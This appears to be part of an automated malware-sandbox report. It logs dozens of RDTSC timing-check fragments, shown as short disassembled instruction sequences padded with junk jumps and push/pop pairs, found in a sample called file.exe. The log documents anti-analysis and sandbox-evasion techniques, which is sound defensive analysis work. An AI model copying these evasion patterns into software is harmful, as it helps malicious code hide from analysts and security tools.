Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C72C4E second address: C72C69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4764D9CBE4h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C72F39 second address: C72F62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F476474B51Dh 0x00000007 jmp 00007F476474B528h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C72F62 second address: C72F77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4764D9CBE1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7323A second address: C7323E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7D380 second address: C7D39B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F4764D9CBE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7C42C second address: C7C440 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F476474B51Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7C440 second address: C7C446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7C446 second address: C7C44A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7C44A second address: C7C462 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F4764D9CBE2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7C5C6 second address: C7C5CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7C874 second address: C7C899 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4764D9CBE4h 0x00000007 jmp 00007F4764D9CBDDh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7CA2D second address: C7CA33 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7CE9E second address: C7CEA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7CEA4 second address: C7CEC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F476474B527h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7CEC2 second address: C7CEC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7CEC7 second address: C7CEFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F476474B522h 0x00000009 jnp 00007F476474B516h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F476474B523h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7D058 second address: C7D073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4764D9CBE7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C86F05 second address: C86F39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F476474B524h 0x00000007 js 00007F476474B516h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F476474B523h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C85289 second address: C8529A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 jnp 00007F4764D9CBD6h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C85590 second address: C8559F instructions: 0x00000000 rdtsc 0x00000002 jns 00007F476474B516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8559F second address: C855A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C855A5 second address: C855AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C85704 second address: C85725 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4764D9CBE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C858BA second address: C858D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F476474B51Fh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007F476474B516h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C85A70 second address: C85A75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C85B9F second address: C85BA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C85D15 second address: C85D1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F4764D9CBD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C85D1F second address: C85D5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F476474B51Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F476474B51Fh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jp 00007F476474B530h 0x00000017 jmp 00007F476474B524h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C85D5E second address: C85D65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C86D70 second address: C86DA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F476474B528h 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a jmp 00007F476474B523h 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8CB2C second address: C8CB32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8CB32 second address: C8CB38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8CB38 second address: C8CB6E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F4764D9CBE3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jmp 00007F4764D9CBE4h 0x00000011 pop ecx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8CB6E second address: C8CB74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8CB74 second address: C8CB9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4764D9CBDFh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4764D9CBE2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8CB9E second address: C8CBA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8CBA2 second address: C8CBA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8CBA6 second address: C8CBB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F476474B516h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8CBB2 second address: C8CBD2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4764D9CBEAh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8CBD2 second address: C8CBD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8CBD8 second address: C8CBDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9ADBB second address: C9ADDF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F476474B51Ah 0x00000008 jl 00007F476474B51Ah 0x0000000e pushad 0x0000000f popad 0x00000010 push esi 0x00000011 pop esi 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 jne 00007F476474B518h 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9FEB9 second address: C9FEC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jng 00007F4764D9CBD6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9FEC6 second address: C9FECC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9FECC second address: C9FEDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4764D9CBDAh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9FEDB second address: C9FEE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9FEE1 second address: C9FEE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9FEE5 second address: C9FEE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9FEE9 second address: C9FF09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4764D9CBE2h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9FF09 second address: C9FF2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F476474B516h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F476474B527h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9FF2D second address: C9FF48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4764D9CBDBh 0x0000000f ja 00007F4764D9CBD6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA579B second address: CA57B2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F476474B51Dh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA57B2 second address: CA57D0 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4764D9CBD6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F4764D9CBDFh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA6EB9 second address: CA6EBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA6EBD second address: CA6EF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F4764D9CBDEh 0x0000000c push esi 0x0000000d pop esi 0x0000000e js 00007F4764D9CBD6h 0x00000014 jo 00007F4764D9CBE5h 0x0000001a jmp 00007F4764D9CBDFh 0x0000001f pushad 0x00000020 pushad 0x00000021 popad 0x00000022 jmp 00007F4764D9CBDDh 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA917B second address: CA917F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA917F second address: CA9187 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAFF44 second address: CAFF53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 jnl 00007F476474B516h 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB2F6D second address: CB2F77 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB2F77 second address: CB2F92 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F476474B51Fh 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB84B3 second address: CB84E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4764D9CBE6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4764D9CBE3h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB84E2 second address: CB84FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F476474B521h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB8659 second address: CB865F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB865F second address: CB8676 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F476474B51Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB8676 second address: CB867C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB8947 second address: CB894D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB894D second address: CB8951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB8951 second address: CB8955 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB8AD0 second address: CB8AEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F4764D9CBD6h 0x0000000a jmp 00007F4764D9CBE1h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB9813 second address: CB982E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F476474B525h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB982E second address: CB983B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F4764D9CBDCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB983B second address: CB983F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB983F second address: CB9846 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBD1E0 second address: CBD213 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F476474B522h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F476474B52Dh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBD213 second address: CBD24F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4764D9CBE3h 0x00000007 pushad 0x00000008 jg 00007F4764D9CBD6h 0x0000000e pushad 0x0000000f popad 0x00000010 push esi 0x00000011 pop esi 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F4764D9CBE7h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBD24F second address: CBD255 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBD3BE second address: CBD3C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBD3C2 second address: CBD3C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBD3C6 second address: CBD3CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBD3CC second address: CBD3E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F476474B520h 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC9578 second address: CC9589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jne 00007F4764D9CBD6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCD2EF second address: CCD316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F476474B528h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c je 00007F476474B51Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCD316 second address: CCD31C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCD31C second address: CCD321 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCD17B second address: CCD17F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCD17F second address: CCD185 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCFA7F second address: CCFA93 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4764D9CBE0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCFA93 second address: CCFAB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F476474B529h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCFAB0 second address: CCFABB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDCB59 second address: CDCB5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDC6E6 second address: CDC702 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 jmp 00007F4764D9CBE2h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDC702 second address: CDC70C instructions: 0x00000000 rdtsc 0x00000002 js 00007F476474B522h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDC70C second address: CDC712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDC883 second address: CDC89D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F476474B521h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDC89D second address: CDC8A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDF2EE second address: CDF305 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pop esi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jc 00007F476474B516h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEE491 second address: CEE497 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEE624 second address: CEE628 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEE78A second address: CEE790 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEE790 second address: CEE7C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F476474B51Ah 0x0000000e pushad 0x0000000f jmp 00007F476474B529h 0x00000014 push eax 0x00000015 pop eax 0x00000016 push esi 0x00000017 pop esi 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEE7C1 second address: CEE7C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
